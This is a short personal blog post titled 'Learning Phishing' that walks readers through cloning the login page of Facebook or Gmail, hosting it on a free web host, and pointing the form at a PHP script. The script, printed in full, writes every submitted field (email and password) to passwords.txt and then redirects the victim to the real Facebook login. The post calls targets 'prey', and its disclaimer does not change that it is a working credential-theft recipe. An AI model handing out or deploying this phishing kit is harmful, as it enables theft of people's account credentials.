Dibyansu Mohanty

Thursday, 9 January 2014

Learning Phishing

Hello Readers,
Today im going to give you a brief idea about Phishing. This will also include a tutorial on how to acquire sensitive information by using phishing*

*Disclaimer- We wont be responsible for  your actions. If you get caught, you  will face horrendous consequences and  may even end up in prison. Remember,  phishing is cyber-crime. 

What is Phishing..?
Phishing is an attempt to get sensitive information from an user by masquerading yourself as trustworthy. In simple language, you use as alias of yourself and all you do is manipulate yourself in such a way that you gain trust of your prey inturn to retrieve the required information..

Here is how you'll do it :
  • Register into any free web hosting fight. Here are some-->Heliohost, x10hosting, Myownfreehost etc
  • Then all you need is Source Page Code of any trusted website..like gmail or facebook.
  • If you are using Chrome/Firefox, you can just right click on the page and select view page source.
  • You'll see a a new tab pop-up. Go to the tab and copy all the contents.
  • Open up Notepad and paste it.
  • Press Ctrl+F in Notepad window to find "action" (this will contain something related to login) and replace it with "Phish.php" and set the method to "get." 
  • Save this file as index.html. (You can give any name, but the extension should be html type)
  • Copy the following code to Notepad (new file) And save it as phish.php :
header(”Location: http://www.facebook.com/login.php “);
$handle = fopen(”passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);
  • Now create another file using notepad and save it as passwords.txt
  • If your web hosting site allows you to upload files then upload all the existing files. If not, you can create files on the web hosting site and put the code accordingly, i.e just copy paste exsting code and name the files accordingly.. :D
  • Cheers! You are done :D
  • If the prey enters his/her email id and password, it'll be transferred and saved in the passwords.txt :D
Any related questions or doubts, you can post a comment or follow me on facebook, googleplus, twitter :-) I'll do my best to answer your questions. Thank you for reading..! 

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